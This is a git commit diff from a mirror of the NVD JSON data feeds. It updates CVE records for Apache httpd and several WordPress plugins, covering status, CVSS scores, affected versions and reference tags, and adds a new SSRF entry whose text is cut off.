admin/nvd-json-data-feeds
1
0
Fork 0
mirror of https://github.com/fkie-cad/nvd-json-data-feeds.git synced 2025-06-21 17:41:05 +00:00
Code Issues Packages Projects Releases Wiki Activity

Auto-Update: 2024-01-19T17:00:25.391679+00:00

Browse Source
This commit is contained in:
cad-safe-bot 2024-01-19 17:00:29 +00:00
parent 4010ee4aa1
commit 13b8c98c4d
83 changed files with 3887 additions and 807 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

816
CVE-2005/CVE-2005-33xx/CVE-2005-3352.json
View File

File diff suppressed because it is too large Load Diff

6
CVE-2007/CVE-2007-44xx/CVE-2007-4465.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2007-4465",
"sourceIdentifier": "cve@mitre.org",
"published": "2007-09-14T00:17:00.000",
"lastModified": "2023-12-22T19:36:14.493",
"lastModified": "2024-01-19T15:13:13.213",
"vulnStatus": "Analyzed",
"descriptions": [
{
@ -330,7 +330,9 @@
"url": "http://www.securityfocus.com/archive/1/479237/100/0/threaded",
"source": "cve@mitre.org",
"tags": [
"Broken Link"
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{

374
CVE-2008/CVE-2008-29xx/CVE-2008-2939.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2008-2939",
"sourceIdentifier": "secalert@redhat.com",
"published": "2008-08-06T18:41:00.000",
"lastModified": "2023-02-13T02:19:16.490",
"vulnStatus": "Modified",
"lastModified": "2024-01-19T15:13:54.737",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -75,48 +75,10 @@
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D623D8C0-65D2-4269-A1D4-5CB3899F44C8"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "67AD11FB-529C-404E-A13B-284F145322B8"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "733D62FE-180A-4AE8-9DBF-DA1DC18C1932"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCBBB7FE-35FC-4515-8393-5145339FCE4D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "F519633F-AB68-495A-B85E-FD41F9F752CA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A894BED6-C97D-4DA4-A13D-9CB2B3306BC5"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*",
"matchCriteriaId": "34A847D1-5AD5-4EFD-B165-7602AFC1E656"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9AF3A0F5-4E5C-4278-9927-1F94F25CCAFC"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "AB63EBE5-CF14-491E-ABA5-67116DFE3E5B"
"criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.2.0",
"versionEndIncluding": "2.2.9",
"matchCriteriaId": "AAAFBA9B-793F-4B2A-89F5-2656C1278563"
}
]
}
@ -172,225 +134,445 @@
"references": [
{
"url": "http://lists.apple.com/archives/security-announce/2009/May/msg00002.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Mailing List"
]
},
{
"url": "http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00000.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=bugtraq&m=123376588623823&w=2",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=bugtraq&m=125631037611762&w=2",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://rhn.redhat.com/errata/RHSA-2008-0967.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://secunia.com/advisories/31384",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/31673",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/32685",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/32838",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/33156",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/33797",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/34219",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/35074",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-247666-1",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://support.apple.com/kb/HT3549",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682868",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682870",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682871",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://wiki.rpath.com/Advisories:rPSA-2008-0327",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0328",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70197",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70937",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.kb.cert.org/vuls/id/663763",
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"US Government Resource"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:194",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:195",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:124",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.rapid7.com/advisories/R7-0033",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.redhat.com/support/errata/RHSA-2008-0966.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/archive/1/495180/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/archive/1/498566/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/archive/1/498567/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/bid/30560",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securitytracker.com/id?1020635",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.ubuntu.com/usn/USN-731-1",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.us-cert.gov/cas/techalerts/TA09-133A.html",
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"US Government Resource"
]
},
{
"url": "http://www.vupen.com/english/advisories/2008/2315",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2008/2461",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2009/0320",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2009/1297",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44223",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"VDB Entry"
]
},
{
"url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11316",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7716",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
}
]
}

69
CVE-2021/CVE-2021-245xx/CVE-2021-24567.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2021-24567",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.050",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:26:00.567",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue."
},
{
"lang": "es",
"value": "El complemento Simple Post WordPress hasta la versi\u00f3n 1.1 no sanitiza la entrada del usuario cuando un valor de texto de usuario autenticado, luego no escapa de estos valores cuando se env\u00eda al navegador, lo que genera un problema de cross site scripting (XSS) almacenado autenticado."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:nickmomrik:simple_post:*:*:*:*:*:wordpress:*:*",
"versionEndIncluding": "1.1",
"matchCriteriaId": "303EC6DD-DD3A-4E54-AF9F-586A11905F54"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/a3cd3115-2181-4e14-8b39-4de096433847/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

74
CVE-2021/CVE-2021-248xx/CVE-2021-24869.json
View File

@ -2,23 +2,87 @@
"id": "CVE-2021-24869",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.103",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:25:42.380",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber"
},
{
"lang": "es",
"value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 no escapa a la entrada del usuario en el m\u00e9todo set_urls_with_terms antes de usarlo en una declaraci\u00f3n SQL, lo que lleva a una inyecci\u00f3n de SQL explotable por usuarios con pocos privilegios, como un suscriptor."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-89"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "0.9.5",
"matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://wpscan.com/vulnerability/b2233795-1a32-45fc-9d51-b6bd0a073f5b/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Third Party Advisory"
]
}
]
}

74
CVE-2021/CVE-2021-248xx/CVE-2021-24870.json
View File

@ -2,23 +2,87 @@
"id": "CVE-2021-24870",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.153",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:25:10.717",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload"
},
{
"lang": "es",
"value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 carece de una verificaci\u00f3n CSRF en su acci\u00f3n AJAX wpfc_save_cdn_integration, y no sanitiza ni escapa algunas de las opciones disponibles a trav\u00e9s de la acci\u00f3n, lo que podr\u00eda permitir a los atacantes hacer que los usuarios registrados con altos privilegios lo llamen y configuren un payload de cross site scripting"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-352"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "0.9.5",
"matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://wpscan.com/vulnerability/48de63ab-2ef1-4469-8fc4-9346068bdf06/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Third Party Advisory"
]
}
]
}

69
CVE-2021/CVE-2021-251xx/CVE-2021-25117.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2021-25117",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.213",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:24:25.360",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled."
},
{
"lang": "es",
"value": "El complemento de WordPress WP-PostRatings anterior a 1.86.1 no sanitiza el par\u00e1metro postratings_image de su p\u00e1gina de opciones (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Aunque solo los administradores pueden acceder a la p\u00e1gina y est\u00e1 protegida contra ataques CSRF, el problema a\u00fan se puede explotar cuando la capacidad unfiltered_html est\u00e1 deshabilitada."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-352"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:lesterchan:wp-postratings:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "1.86.1",
"matchCriteriaId": "28B896C6-D8D0-4B5D-8B36-244EBDF8FEA9"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/d2d9a789-edae-4ae1-92af-e6132db7efcd/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2021/CVE-2021-42xx/CVE-2021-4227.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2021-4227",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.270",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:25.803",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section"
},
{
"lang": "es",
"value": "El complemento de WordPress ark-commenteditor hasta la versi\u00f3n 2.15.6 no sanitiza ni codifica adecuadamente los comentarios cuando est\u00e1 en el editor de c\u00f3digo fuente, lo que permite a los atacantes inyectar un iFrame en la p\u00e1gina y, por lo tanto, cargar contenido arbitrario desde cualquier p\u00e1gina a la secci\u00f3n de comentarios."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:obg:ark_wysiwyg_comment_editor:*:*:*:*:*:wordpress:*:*",
"versionEndIncluding": "2.15.6",
"matchCriteriaId": "0D7DDA5E-7004-48F6-A6E7-4D283878B1DE"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/8d015eba-31dc-44cb-a051-4e95df782b75/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

8
CVE-2022/CVE-2022-236xx/CVE-2022-23633.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2022-23633",
"sourceIdentifier": "security-advisories@github.com",
"published": "2022-02-11T21:15:11.990",
"lastModified": "2023-07-11T20:41:55.303",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.417",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -200,6 +200,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0013/",
"source": "security-advisories@github.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5372",
"source": "security-advisories@github.com",

111
CVE-2022/CVE-2022-407xx/CVE-2022-40700.json Normal file
View File

@ -0,0 +1,111 @@
{
"id": "CVE-2022-40700",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.020",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP \u2013 Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet \u2013 A virtual wallet for WooCommerce, Long Watch Studio WooVIP \u2013 Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply \u2013 Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder \u2013 Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet \u2013 A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP \u2013 Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply \u2013 Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder \u2013 Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a 